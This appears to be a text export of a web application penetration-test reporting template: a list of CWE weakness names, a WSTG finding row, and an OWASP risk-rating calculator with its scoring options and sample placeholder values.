CWE-522 Insufficiently Protected Credentials
CWE-524 Use of Cache Containing Sensitive Information
CWE-525 Use of Web Browser Cache Containing Sensitive Information
CWE-620 Unverified Password Change
CWE-640 Weak Password Recovery Mechanism for Forgotten Password
CWE-804 Guessable CAPTCHA
CWE-1391 Use of Weak Credentials
CWE-1392 Use of Default Credentials
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-23 Relative Path Traversal
CWE-35 Path Traversal: '.../...//'
CWE-269 Improper Privilege Management
CWE-285 Improper Authorization
CWE-290 Authentication Bypass by Spoofing
CWE-345 Insufficient Verification of Data Authenticity
CWE-639 Authorization Bypass Through User-Controlled Key
CWE-732 Incorrect Permission Assignment for Critical Resource
CWE-798 Use of Hard-coded Credentials
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CWE-862 Missing Authorization
CWE-863 Incorrect Authorization
CWE-16 Configuration
CWE-315 Cleartext Storage of Sensitive Information in a Cookie
CWE-330 Use of Insufficiently Random Values
CWE-345 Insufficient Verification of Data Authenticity
CWE-352 Cross-Site Request Forgery (CSRF)
CWE-384 Session Fixation
CWE-523 Unprotected Transport of Credentials
CWE-539 Use of Persistent Cookies Containing Sensitive Information
CWE-598 Use of GET Request Method With Sensitive Query Strings
CWE-613 Insufficient Session Expiration
CWE-614 Sensitive Cookie in HTTPS Session Without 'Secure' Attribute
CWE-694 Use of Multiple Resources with Duplicate Identifier
CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')
CWE-798 Use of Hard-coded Credentials
CWE-841 Improper Enforcement of Behavioral Workflow
CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag
CWE-1275 Sensitive Cookie with Improper SameSite Attribute
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injec
CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CWE-90 Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')
CWE-91 XML Injection (aka Blind XPath Injection)
CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection')
CWE-94 Improper Control of Generation of Code ('Code Injection')
CWE-95 Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
CWE-97 Improper Neutralization of Server-Side Includes (SSI) Within a Web Page
CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File
CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
CWE-116 Improper Encoding or Escaping of Output
CWE-134 Use of Externally-Controlled Format String
CWE-147 Improper Neutralization of Input Terminators
CWE-235 Improper Handling of Extra Parameters
CWE-434 Unrestricted Upload of File with Dangerous Type
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CWE-611 Improper Restriction of XML External Entity Reference
CWE-643 Improper Neutralization of Data within XPath Expressions ('XPath Injection')
CWE-652 Improper Neutralization of Data within XQuery Expressions ('XQuery Injection')
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CWE-915 Improperly Controlled Modification of Dynamically-Determined Object Attributes
CWE-918 Server-Side Request Forgery (SSRF)
CWE-1236 Improper Neutralization of Formula Elements in a CSV File
CWE-1336 Improper Neutralization of Special Elements Used in a Template Engine
CWE-209 Generation of Error Message Containing Sensitive Information
CWE-210 Self-generated Error Message Containing Sensitive Information
CWE-431 Missing Handler
CWE-497 Exposure of Sensitive System Information to an Unauthorized Control Sphere
CWE-544 Missing Standardized Error Handling Mechanism
CWE-550 Server-generated Error Message Containing Sensitive Information
CWE-728 Improper Error Handling
CWE-261 Weak Encoding for Password
CWE-295 Improper Certificate Validation
CWE-296 Improper Following of a Certificate's Chain of Trust
CWE-297 Improper Validation of Certificate with Host Mismatch
CWE-298 Improper Validation of Certificate Expiration
CWE-310 Cryptographic Issues
CWE-311 Missing Encryption of Sensitive Data
CWE-319 Cleartext Transmission of Sensitive Information
CWE-320 Key Management Errors
CWE-321 Use of Hard-coded Cryptographic Key
CWE-322 Key Exchange without Entity Authentication
CWE-323 Reusing a Nonce, Key Pair in Encryption
CWE-324 Use of a Key Past its Expiration Date
CWE-325 Missing Cryptographic Step
CWE-326 Inadequate Encryption Strength
CWE-327 Use of a Broken or Risky Cryptographic Algorithm
CWE-328 Reversible One-Way Hash
CWE-329 Not Using a Random IV with CBC Mode
CWE-330 Use of Insufficiently Random Values
CWE-331 Insufficient Entropy
CWE-335 Incorrect Usage of Seeds in Pseudo-Random Number Generator(PRNG)
CWE-336 Same Seed in Pseudo-Random Number Generator (PRNG)
CWE-337 Predictable Seed in Pseudo-Random Number Generator (PRNG)
CWE-338 Use of Cryptographically Weak Pseudo-Random Number Generator(PRNG)
CWE-340 Generation of Predictable Numbers or Identifiers
CWE-347 Improper Verification of Cryptographic Signature
CWE-354 Improper Validation of Integrity Check Value
CWE-523 Unprotected Transport of Credentials
CWE-649 Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking
CWE-757 Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')
CWE-759 Use of a One-Way Hash without a Salt
CWE-760 Use of a One-Way Hash with a Predictable Salt
CWE-780 Use of RSA Algorithm without OAEP
CWE-798 Use of Hard-coded Credentials
CWE-916 Use of Password Hash With Insufficient Computational Effort
CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CWE-434 Unrestricted Upload of File with Dangerous Type
CWE-472 External Control of Assumed-Immutable Web Parameter
CWE-602 Client-Side Enforcement of Server-Side Security
CWE-693 Protection Mechanism Failure
CWE-799 Improper Control of Interaction Frequency
CWE-807 Reliance on Untrusted Inputs in a Security Decision
CWE-840 Business Logic Errors
CWE-841 Improper Enforcement of Behavioral Workflow
CWE-20 Improper Input Validation
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
CWE-312 Cleartext Storage of Sensitive Information
CWE-313 Cleartext Storage in a File or on Disk
CWE-315 Cleartext Storage of Sensitive Information in a Cookie
CWE-319 Cleartext Transmission of Sensitive Information
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CWE-922 Insecure Storage of Sensitive Information
CWE-942 Permissive Cross-domain Policy with Untrusted Domains
CWE-1020 Verify Message Integrity
CWE-1021 Improper Restriction of Rendered UI Layers or Frames
CWE-1022 Use of Web Link to Untrusted Target with window.opener Access
CWE-1347 Injection
CWE-1347 Injection
e Inclusion')
Web Application Vulnerabilities Template

No WSTG-ID Issue Name Risk

1 WSTG-INFO-001 High
Likelihood Impact OWASP Top 10 Observation and Implication
Mapping
Moderate High
Recommendation Test Evidence
OWASP Risk Assessment Calculator
Risk Assessment Calculator
Likelihood factors
Threat Agent Factors
Skills required Some technical skills [3] 3
Motive Possible reward [4] 4
Opportunity Special access or resources required [4] 4
Population Size Partners [5] 5

Vulnerability Factors
Easy of Discovery Automated tools available [9] 9
Ease of Exploit Automated tools available [9] 9
Awareness Hidden [4] 4
Intrusion Detection Logged without review [8] 8

Likelihood score: 5.75

Overall Risk Severity : Low

Impact
Likelihood ->Low<- Moderate High
Low Note Low Moderate
->Moderate<- ->Low<- Moderate High
High Moderate High Critical
Impact factors
Technical Impact Factors
Loss of confidentiality Extensive non-sensitive data disclosed [6] 6
Loss of Integrity Minimal slightly corrupt data [1] 1
Loss of Availability Minimal secondary services interrupted [1] 1
Loss of Accountability Attack fully traceable to individual [1] 1

Business Impact Factors

Financial damage Minor effect on annual profit [3] 3
Reputation damage Loss of major accounts [4] 4
Non-Compliance Not Applicable [0] 0
Privacy violation One individual [3] 3

Impact score: 2.375

Skills required Motive Opportunity
Select an option Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0 Full access or expensive resources required [0] 0
No technical skills [1] 1 Low or no reward [1] 1 Special access or resources required [4] 4
Some technical skills [3] 3 Possible reward [4] 4 Some access or resources required [7] 7
Advanced computer user [5] 5 High reward [9] 9 No access or resources required [9] 9
Network and programming skills [6] 6
Security penetration skills [9] 9

Loss of confidentiality Loss of Integrity Loss of Availability

Select an option Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0 Not Applicable [0] 0
Minimal non-sensitive data disclosed [2] 2 Minimal slightly corrupt data [1] 1 Minimal secondary services interrupted [1] 1
Extensive non-sensitive data disclosed [6] 6 Minimal seriously corrupt data [3] 3 Minimal primary services interrupted [5] 5
Extensive critical data disclosed [7] 7 Extensive slightly corrupt data [5] 5 Extensive primary services interrupted [7] 7
All data disclosed [9] 9 Extensive seriously corrupt data [7] 7 All services completely lost [9] 9
All data totally corrupt [9] 9
Population Size Easy of Discovery Ease of Exploit
Select an option Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0 Not Applicable [0] 0
System Administrators [2] 2 Practically impossible [1] 1 Theoretical [1] 1
Intranet Users [4] 4 Difficult [3] 3 Difficult [3] 3
Partners [5] 5 Easy [7] 7 Easy [5] 5
Authenticated users [6] 6 Automated tools available [9] 9 Automated tools available [9] 9
Anonymous Internet users [9] 9

Loss of Accountability Financial damage Reputation damage

Select an option Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0 Not Applicable [0] 0
Attack fully traceable to individual [1] 1 Damage costs less than to fix the issue [1] 1 Minimal damage [1] 1
Attack possibly traceable to individual [7] 7 Minor effect on annual profit [3] 3 Loss of major accounts [4] 4
Attack completely anonymous [9] 9 Significant effect on annual profit [7] 7 Loss of goodwill [5] 5
Backruptcy [9] 9 Brand damage [9] 9
Awareness Intrusion Detection
Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
Unknown [1] 1 Active detection in application [1] 1
Hidden [4] 4 Logged and reviewed [3] 3
Obvious [6] 6 Logged without review [8] 8
Public knowledge [9] 9 Not logged [9] 9

Non-Compliance Privacy violation

Select an option Select an option
Not Applicable [0] 0 Not Applicable [0] 0
Minor violation [2] 2 One individual [3] 3
Clear violation [5] 5 Hundreds of people [5] 5
High profile violation [7] 7 Thousands of people [7] 7
Millions of people [9] 9